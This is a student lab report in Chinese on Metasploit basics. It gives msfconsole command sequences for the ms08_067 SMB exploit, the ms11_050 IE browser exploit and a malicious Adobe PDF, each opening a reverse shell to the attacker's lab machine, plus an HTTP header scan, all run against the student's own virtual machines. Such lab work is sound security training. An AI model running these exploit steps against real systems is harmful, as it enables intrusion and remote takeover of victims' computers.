2018-2019 20165208 網絡對抗 Exp5 MSF基礎
實驗內容
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.1一個主動攻擊實踐,如ms08_067; (1分)
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)
1.3 一個針對客戶端的攻擊,如Adobe;(1分)
1.4 成功應用任何一個輔助模塊。(0.5分)
1.5 報告評分(1分)
基礎問題回答
用自己的話解釋什么是exploit,payload,encode.
- exploit:指由攻擊者利用安全漏洞,將負責攻擊的代碼payload傳送到靶機中。
- payload:是target在被滲透攻擊之后去執行的惡意代碼,如ex1的shellcode。
- encode:進行編碼改變payload形態,使其不出現特定字符。
實踐過程記錄
1.一個主動攻擊實踐,如ms08_067;
①攻擊機:kali IP:192.168.119.128
②靶機:windows XP SP3(English) IP:192.168.119.129(失敗)
②靶機:windows 2000 Professional(English) IP:192.168.119.130(成功)
-
在攻擊機kali輸入msfconsole進入控制台,依次輸入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi
//使用ms08_067漏洞,use后其實是漏洞所在目錄路徑名msf exploit(ms08_067_netapi) > show payloads
//顯示回連攻擊載荷msf exploit(ms08_067_netapi) > set payload
generic/shell_reverse_tcp
//tcp反向回連msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128
//攻擊機ipmsf exploit(ms08_067_netapi) > set LPORT 5208
//攻擊端口msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129
//靶機ip,特定漏洞端口已經固定msf exploit(ms08_067_netapi) > set target 0
//自動選擇目標系統類型,匹配度較高msf exploit(ms08_067_netapi) > exploit
//攻擊
-
建立會話,攻擊失敗顯示如下:
-
通過網上查找資料,發現可能是打過補丁的原因,更換虛擬機。
-
選擇靶機windows 2000 Professional(English)。
-
按上述命令進行操作,記得更換IP。
-
顯示監聽成功,
dir
命令成功。
2. 一個針對瀏覽器的攻擊,如ms11_050;
①攻擊機:kali IP:192.168.119.128
②靶機:windows 7 x64 IP:192.168.119.131 IE:8.0(失敗)
②靶機:windows Sever 2008 IP:192.168.119.132(成功)
-
在攻擊機kali輸入msfconsole進入控制台,依次輸入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
//使用瀏覽器ms11_050漏洞msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http
//http反向回連msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128
//攻擊機ipmsf exploit(ms11_050_cobjectelement) > set LPORT 5208
//攻擊端口固定msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky
//統一資源標識符路徑設置msf exploit(ms11_050_cobjectelement) > exploit
-
運行靶機瀏覽器,這時win7出現DNS服務器未響應,嘗試解決無果后,更換了虛擬機。
-
操作同上
-
在訪問
http://192.168.119.128:8080/5208ky
時,可見攻擊機出現訪問信息。
3. 一個針對客戶端的攻擊,如Adobe;
①攻擊機:kali IP:192.168.119.128
②靶機:windows XP sp2 IP:192.168.119.133
Adobe:9.3
-
在攻擊機kali輸入msfconsole進入控制台,依次輸入以下指令:
- `msf > use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回連
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128
//攻擊機ipmsf exploit(adobe_cooltype_sing) > set LPORT 5208
//攻擊端口msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf
//設置生成pdf文件的名字msf exploit(adobe_cooltype_sing) > exploit
//攻擊
-
成功生成20165208.pdf。
-
將pdf文件傳送或拷貝到靶機上后,在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:
msf > use exploit/multi/handler
//進入監聽模塊msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向連接msf exploit(handler) > set LHOST 192.168.119.128
//攻擊機ipmsf exploit(handler) > set LPORT 5208
//攻擊端口固定msf exploit(handler) > exploit
-
然后在靶機上打開20165208.pdf文件。
-
kali連接成功。
-
攻擊機運行ipconfig命令,可顯示靶機IP地址。
-
靶機關閉pdf文件,則失去權限。
4. 成功應用任何一個輔助模塊(scanner/http/http_header 唯一)
-
使用命令msf > show auxiliary查看所有的輔助模塊
-
在看的時候我試了幾個,因為好多命令的描述我不能准確的定位到它功能,最后我選擇了
scanner/http/http_header
-
info scanner/http/http_header
查看命令相關信息。
-
我們可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以為它是給我返回瀏覽器的頭部信息,也就是可以監聽對方訪問網頁瀏覽的是什么。
-
實際操作:首先
use scanner/http/http_header
調用模塊,然后根據info得出的參數信息對參數進行設定
use scanner/http/http_header
set RHOSTS 192.168.119.132
RHOSTS => 192.168.119.132
set HTTP_METHOD GET
set RPORT 8080
exploit
set RPORT 80
exploit
- 在端口80監聽時我們可以看到返回信息
Microsoft-IIS/7.0
- 可以得出結論:目標計算機80端口上運行着IIS 7.0,
而在歷年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影響的漏洞數居前四位。同時我們可以大概根據IIS 7.0 判斷出它的操作系統版本為Win 200或Vista全系列 。這和我們的靶機系統也是匹配的。
IIS版本 | 系統版本 | 受影響漏洞數量 |
---|---|---|
IIS 5.0 | Windows 2000 | 10 |
IIS 5.1 | Windows XP 系列 | 16 |
IIS 7.0 | Win 2008、Vista全系列 | 11 |
IIS 10.0 | Win 10和Win 2016 | 2 |
實驗中遇到的問題及解決方法
1.問題:在主動攻擊實踐時,操作完exploit
后顯示 Exploit completed, but no session was created.
查了資料后我做了以下幾個修改嘗試:
我最初設的target參數是0,即自動選擇目標系統類型。在嘗試解決時我選了設為6。想說會不會這樣的匹配度更合適,失敗了。
后來找到過程中看到有說可能是系統打了補丁,使攻擊難以進行。所以就選擇更換了虛擬機。
2.問題:在進行針對瀏覽器的攻擊時,靶機顯示無法顯示該網頁
。進行診斷后提示是DNS服務器未響應。
根據網絡診斷提示DNS服務器未響應,我進行了三種嘗試,分別如下:
不過,so sad,失敗了,最后選擇更換為win 2008虛擬機。
離實戰還缺些什么技術或步驟?
現在的操作限定條件較多,對靶機,對版本,對補丁都多有要求,而對於更接近現實的攻擊情況而言,自己的能力還有限,對於代碼編寫類的依賴已有教程的情況比較多,也就決定了攻擊可能已經被破解,從而達不到既定的要求。
實驗感想
本次實驗對MSF做了簡單的試操作,在找到合適的虛擬機后實驗還是相對清晰、簡單的。在這個過程中,學會查找很主要,info
、show targets
、show payloads
等命令都幫了我不少忙。在整個實驗中第四個模塊是我獨立完成的,網絡上有關我選的這個命令的直接使用教程還是蠻少的,但是可以發現很多其他的例子。舉一反三,懷着未知的忐忑去嘗試成功后還是蠻有成就感的。